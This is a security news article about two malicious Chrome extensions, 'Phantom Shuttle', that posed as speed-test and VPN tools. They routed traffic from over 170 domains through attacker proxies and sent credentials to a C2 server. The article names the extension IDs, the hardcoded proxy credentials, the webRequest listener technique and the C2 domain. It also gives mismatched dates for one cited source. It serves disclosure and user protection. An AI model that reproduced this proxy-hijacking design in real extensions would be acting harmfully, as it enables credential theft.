Malicious Chrome Extensions ‘Phantom Shuttle’ Compromise User Credentials Across 170+ Sites
In a recent cybersecurity revelation, two Chrome extensions named Phantom Shuttle have been identified as malicious tools designed to intercept user traffic and steal credentials from over 170 websites. These extensions, masquerading as network speed test tools, have been available on the Chrome Web Store, with one dating back to 2017 and the other introduced in April 2023.
Details of the Malicious Extensions:
– Phantom Shuttle (ID: fbfldogmkadejddihifklefknmikncaj): Published on November 26, 2017, this extension has amassed approximately 2,000 users.
– Phantom Shuttle (ID: ocpcmfmiidofonkbodpdhgddhlcmcofd): Released on April 27, 2023, it has around 180 users.
Both extensions are promoted as multi-location network speed test plug-ins targeting developers and foreign trade professionals. Users are enticed to subscribe to VIP services, with fees ranging from ¥9.9 to ¥95.9 CNY ($1.40 to $13.50 USD), under the pretense of accessing legitimate VPN functionalities.
Malicious Operations Unveiled:
Upon subscription, the extensions activate a smarty proxy mode, rerouting traffic from over 170 specified domains through servers controlled by the attackers. This setup enables the extensions to function as man-in-the-middle proxies, intercepting and exfiltrating user data to a command-and-control (C2) server.
To maintain the illusion of legitimacy, the extensions perform actual latency tests on proxy servers and display connection statuses, all while covertly executing their malicious activities.
Technical Mechanisms of the Attack:
The extensions incorporate malicious code into two JavaScript libraries, `jquery-1.12.2.min.js` and `scripts.js`, included within the extensions. This code registers a listener on `chrome.webRequest.onAuthRequired`, automatically injecting hardcoded proxy credentials (`topfany / 963852wei`) into every HTTP authentication challenge across all websites. This process occurs without user awareness, as the extensions respond to authentication requests before any credential prompts are displayed.
Once authenticated to a proxy server, the extensions configure Chrome’s proxy settings using a Proxy Auto-Configuration (PAC) script, implementing three modes:
1. Close: Disables the proxy feature.
2. Always: Routes all web traffic through the proxy.
3. Smarty: Routes traffic from a predefined list of over 170 high-value domains through the proxy.
The targeted domains encompass a wide range of platforms, including developer sites (GitHub, Stack Overflow, Docker), cloud services (Amazon Web Services, Digital Ocean, Microsoft Azure), enterprise solutions (Cisco, IBM, VMware), social media platforms (Facebook, Instagram, Twitter), and adult content sites. The inclusion of adult sites suggests a potential strategy to blackmail victims.
Continuous Data Exfiltration:
The extensions maintain a 60-second heartbeat communication with their C2 server at `phantomshuttle[.]space`, transmitting VIP users’ emails, plaintext passwords, and version numbers. This persistent connection allows attackers to capture traffic, manipulate responses, and inject arbitrary payloads, effectively granting them a comprehensive view of the users’ online activities.
Broader Implications and Historical Context:
This incident is part of a larger pattern of malicious Chrome extensions compromising user security. For instance, in December 2025, a campaign linked to the threat actor ShadyPanda involved browser extensions with over 4.3 million installations being transformed into spyware. These extensions monitored website visits, exfiltrated browsing histories, and collected detailed browser fingerprints. ([thehackernews.com](https://thehackernews.com/2025/12/shadypanda-turns-popular-browser.html?utm_source=openai))
Similarly, in December 2025, a campaign targeted known Chrome browser extensions, leading to at least 35 extensions being compromised and exposing over 2.6 million users to data exposure and credential theft. ([thehackernews.com](https://thehackernews.com/2024/12/16-chrome-extensions-hacked-exposing.html?utm_source=openai))
Recommendations for Users:
Users who have installed either of the Phantom Shuttle extensions are strongly advised to:
– Uninstall the Extensions Immediately: Remove the extensions from your Chrome browser to prevent further data interception.
– Change All Passwords: Update passwords for all accounts, especially those associated with the targeted domains.
– Monitor Account Activity: Regularly check for unauthorized access or unusual activities in your accounts.
– Exercise Caution with Extensions: Be vigilant when installing browser extensions. Verify the credibility of the developer and read user reviews before installation.
Conclusion:
The discovery of the Phantom Shuttle extensions underscores the critical need for users to exercise caution when installing browser add-ons. Cybercriminals continue to exploit trusted platforms to distribute malicious software, emphasizing the importance of proactive security measures and user awareness in safeguarding personal information.
